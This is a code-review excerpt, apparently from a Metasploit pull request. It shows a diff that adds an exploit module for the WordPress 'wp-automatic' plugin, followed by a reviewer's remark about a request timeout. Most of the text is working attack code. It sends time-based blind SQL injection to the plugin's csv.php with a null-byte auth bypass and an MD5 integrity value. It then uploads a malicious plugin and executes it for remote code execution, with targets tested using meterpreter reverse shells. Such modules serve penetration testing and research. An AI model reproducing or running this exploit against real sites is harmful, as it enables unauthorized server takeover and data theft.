modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb

```diff
@@ -0,0 +1,163 @@
+        'DisclosureDate' => '2024-03-13',
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username to create', Faker::Internet.username]),
+        OptString.new('PASSWORD', [false, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
+        OptString.new('EMAIL', [false, 'Email for the new user', Faker::Internet.email])
+      ]
+    )
+  end
+
+  def create_sqli_instance
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      execute_sql_query(payload)
+    end
+  end
+
+  def execute_sql_query(query)
+    formatted_query = query.strip.upcase.start_with?('INSERT') ? query : "SELECT (#{query})"
+    response = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-automatic', 'inc', 'csv.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'q' => formatted_query,
+        'auth' => "\0",
+        'integ' => Rex::Text.md5(formatted_query)
+      }
+    })
+
+    unless response
+      fail_with(Failure::UnexpectedReply, "Failed to execute SQL query: #{query}")
+    end
+  end
+
+  def upload_and_execute_payload(admin_cookie)
+    plugin_name = Faker::App.name.gsub(/\s+/, '').downcase
+    payload_name = Faker::Hacker.noun.gsub(/\s+/, '').downcase
+
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status('Uploading payload...')
+
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("Executing the payload at #{payload_uri}...")
+
+    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
+    send_request_cgi({
+      'uri' => payload_uri,
+      'method' => 'GET'
+    }, 1)
```

Comment:
Does this need to change the default timeout? If you're expecting it to timeout, then it'd be a good idea to use 0, if you're not then leaving it at the default would be preferred.
```suggestion
    send_request_cgi({
      'uri' => payload_uri,
      'method' => 'GET'
    })
```